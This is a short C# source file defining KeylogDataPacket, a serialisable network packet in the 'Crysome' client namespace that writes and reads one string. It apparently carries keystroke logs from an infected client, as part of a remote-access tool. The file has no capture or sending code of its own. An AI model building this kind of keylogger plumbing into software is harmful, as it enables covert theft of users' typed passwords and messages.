using System.IO;

namespace Crysome.Common.Network.Packets.Client;

public class KeylogDataPacket : IPacket
{
	public string Data { get; set; } = "";

	public KeylogDataPacket()
	{
	}

	public KeylogDataPacket(string data)
	{
		Data = data ?? "";
	}

	public void Write(BinaryWriter w)
	{
		w.Write(Data ?? "");
	}

	public void Read(BinaryReader r)
	{
		Data = r.ReadString();
	}
}
